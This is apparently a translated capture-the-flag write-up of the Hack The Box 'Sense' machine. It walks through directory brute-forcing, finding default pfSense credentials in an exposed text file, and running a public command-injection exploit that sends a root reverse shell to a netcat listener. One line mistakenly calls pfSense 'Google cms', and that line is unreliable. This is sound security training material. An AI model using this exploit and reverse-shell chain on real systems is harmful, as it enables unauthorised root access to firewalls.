Disclaimers
The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.
Service detection
ot💀kali)-[~/htb/Sense] └─# nmap -sV -Pn 10.10.10.60 1 ⨯ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 09:15 EST Nmap scan report for 10.10.10.60 Host is up (0.36s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 443/tcp open ssl/http lighttpd 1.4.35
Only the http service is enabled, so we can only start from the web
Catalog blasting
┌──(root💀kali)-[~/dirsearch] └─# gobuster dir -w /usr/share/wordlists/Web-Content/common.txt -u https://10.10.10.60/ -t 30 -k 1 ⨯ =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://10.10.10.60/ [+] Method: GET [+] Threads: 30 [+] Wordlist: /usr/share/wordlists/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/12/09 09:30:38 Starting gobuster in directory enumeration mode =============================================================== /classes (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/] /css (Status: 301) [Size: 0] [--> https://10.10.10.60/css/] /favicon.ico (Status: 200) [Size: 1406] /includes (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/] /index.html (Status: 200) [Size: 329] /index.php (Status: 200) [Size: 6690] /installer (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/] /javascript (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/] /themes (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/] /tree (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/] /widgets (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/] /xmlrpc.php (Status: 200) [Size: 384]
In addition, use dirserch to find a file changelog txt
# Security Changelog ### Issue There was a failure in updating the firewall. Manual patching is therefore required ### Mitigated 2 of 3 vulnerabilities have been patched. ### Timeline The remaining patches will be installed during the next maintenance window
Said that updating the firewall failed and two of the three vulnerabilities have been modified.
That means there's another vulnerability that hasn't been fixed?
Search for cms vulnerabilities
Port 80 is a cms called pfsense. Search for vulnerabilities in this cms, most of which are xss vulnerabilities and command injection vulnerabilities. We focus on command injection.
─# searchsploit pfsense -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- pfSense - 'interfaces.php?if' Cross-Site Scripting | hardware/remote/35071.txt pfSense - 'pkg.php?xml' Cross-Site Scripting | hardware/remote/35069.txt pfSense - 'pkg_edit.php?id' Cross-Site Scripting | hardware/remote/35068.txt pfSense - 'status_graph.php?if' Cross-Site Scripting | hardware/remote/35070.txt pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit) | unix/remote/43193.rb pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities | php/remote/34985.txt pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution | php/webapps/23901.txt pfSense 2.1 build 20130911-1816 - Directory Traversal | php/webapps/31263.txt pfSense 2.2 - Multiple Vulnerabilities | php/webapps/36506.txt pfSense 2.2.5 - Directory Traversal | php/webapps/39038.txt pfSense 2.3.1_1 - Command Execution | php/webapps/43128.txt pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery | php/webapps/41501.txt Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection | php/webapps/47413.py pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit) | php/remote/43341.rb pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting | php/webapps/46538.txt pfSense 2.4.4-p1 - Cross-Site Scripting | multiple/webapps/46316.txt pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting | php/webapps/46936.txt pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting | freebsd/webapps/48300.txt pfSense 2.4.4-p3 - Cross-Site Request Forgery | php/webapps/48714.txt pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py pfSense Community Edition 2.2.6 - Multiple Vulnerabilities | php/webapps/39709.txt pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery | php/webapps/39306.html pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery | php/webapps/39695.txt pfSense UTM Platform 2.0.1 - Cross-Site Scripting | freebsd/webapps/24439.txt -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
However, the command injection vulnerability requires the password of cms, so what is the password?
Specifies the extension
Specify several specific file extensions, change to a larger dictionary, and blow up again
$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -x php,cgi,html,txt -t 20 =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://10.10.10.60 [+] Method: GET [+] Threads: 30 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php,cgi,html,txt [+] Timeout: 10s =============================================================== 2021/12/11 02:41:05 Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 200) /index.html (Status: 200) /help.php (Status: 200) /themes (Status: 301) /stats.php (Status: 200) /css (Status: 301) /edit.php (Status: 200) /includes (Status: 301) /license.php (Status: 200) /system.php (Status: 200) /status.php (Status: 200) /javascript (Status: 301) /changelog.txt (Status: 200) /classes (Status: 301) /exec.php (Status: 200) /widgets (Status: 301) /graph.php (Status: 200) /tree (Status: 301) /wizard.php (Status: 200) /shortcuts (Status: 301) /pkg.php (Status: 200) /installer (Status: 301) /wizards (Status: 301) /xmlrpc.php (Status: 200) /reboot.php (Status: 200) /interfaces.php (Status: 200) /csrf (Status: 301) /system-users.txt (Status: 200) /filebrowser (Status: 301) /%7Echeckout%7E (Status: 403)
system-users.txt prompt
####Support ticket### Please create the following user username: Rohit password: company defaults
Now we know a login user name, and the password is said to be the default password of the company
The default login password of Google cms is admin:pfsense
Now you can log in normally with rohit:pfsense
attack
We choose This exp
According to exp steps:
Turn on a monitor
nc -lnvp 4444
Execute attack
─(root💀kali)-[~/htb/Sense] └─# python3 43560.py --rhost 10.10.10.60 --lhos 10.10.14.3 --lpor 4444 --username rohit --password pfsense CSRF token obtained Running exploit... Exploit completed
3. Receipt
┌──(root💀kali)-[~/htb/Sense] └─# nc -lnvp 4444 listening on [any] 4444 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.60] 7866 sh: can't access tty; job control turned off # id uid=0(root) gid=0(wheel) groups=0(wheel) # whoami root
Is already root and can read any file.
summary
After that, you will find that it is a very simple target. The difficulty lies in choosing the extension and dictionary when the directory explodes for the second time. I've been stuck here for a long time. I've tried all kinds of blasting tools and large and small dictionaries.
Popping the user name directly in the browser is a bit ctf, which should be rare in the real environment.